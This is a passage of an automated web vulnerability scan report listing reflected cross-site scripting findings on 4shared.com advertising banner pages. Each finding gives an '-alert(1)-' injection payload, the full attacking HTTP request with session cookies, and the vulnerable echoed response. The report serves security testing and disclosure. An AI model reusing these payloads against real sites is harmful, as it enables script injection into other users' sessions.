<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise5290d'-alert(1)-'b61d4324986/banners/desktop/300x250.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox(
...[SNIP]...

1.220. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdfe3"-alert(1)-"24e87bceef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:36 GMT
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.221. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9726'-alert(1)-'e2a9e3352c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/bannersa9726'-alert(1)-'e2a9e3352c0/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/bannersa9726'-alert(1)-'e2a9e3352c0/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:38 GMT
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise/bannersa9726'-alert(1)-'e2a9e3352c0/desktop/300x250.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
...[SNIP]...

1.222. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2c5"-alert(1)-"4c8ee2c4559 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:50 GMT
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.223. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b367'-alert(1)-'e3b1ebbd27b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktop1b367'-alert(1)-'e3b1ebbd27b/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop1b367'-alert(1)-'e3b1ebbd27b/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:52 GMT
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
= 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise/banners/desktop1b367'-alert(1)-'e3b1ebbd27b/300x250.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.224. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24af2"-alert(1)-"972becc4068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:33:03 GMT
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.225. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b4ac'-alert(1)-'da3984ca4a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktop/300x250.jsp3b4ac'-alert(1)-'da3984ca4a1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop/300x250.jsp3b4ac'-alert(1)-'da3984ca4a1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:33:05 GMT
Content-Length: 36325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise/banners/desktop/300x250.jsp3b4ac'-alert(1)-'da3984ca4a1',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.226. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e997"-alert(1)-"7bb2d897bb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3DAF2D9C428EAB31F61D3BF61A35CD60.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:31:54 GMT
Content-Length: 36320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.227. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99d90'-alert(1)-'8627429a791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise99d90'-alert(1)-'8627429a791/banners/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise99d90'-alert(1)-'8627429a791/banners/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3ECE3BA190153DD1FC83D9A793C6E44.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:31:56 GMT
Content-Length: 36331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise99d90'-alert(1)-'8627429a791/banners/desktop/728x90.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox()
...[SNIP]...

1.228. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea67b'-alert(1)-'2133018e490 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/bannersea67b'-alert(1)-'2133018e490/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/bannersea67b'-alert(1)-'2133018e490/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1D5D5DAC3899DB77BB4B92D0C15AAFB8.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:11 GMT
Content-Length: 36331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise/bannersea67b'-alert(1)-'2133018e490/desktop/728x90.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

1.229. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a805f"-alert(1)-"4c476fd3f21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BCC54BBB2A80A834314C7F9C9B8CCA67.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:09 GMT
Content-Length: 36331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback
...[SNIP]...

1.230. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6df2'-alert(1)-'836026be35f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktopf6df2'-alert(1)-'836026be35f/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktopf6df2'-alert(1)-'836026be35f/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AE9D8A2B08B9249B7285999912E2F221.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:26 GMT
Content-Length: 36325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
= 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise/banners/desktopf6df2'-alert(1)-'836026be35f/728x90.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.231. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31ad"-alert(1)-"d183c0a7079 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A9E5C096071D6B340A0CD040F160790B.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:24 GMT
Content-Length: 36331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.232. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5a0d'-alert(1)-'3fd2aaf8faa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise/banners/desktop/728x90.jspd5a0d'-alert(1)-'3fd2aaf8faa HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktop/728x90.jspd5a0d'-alert(1)-'3fd2aaf8faa
Server: Apache-Coyote/1.1
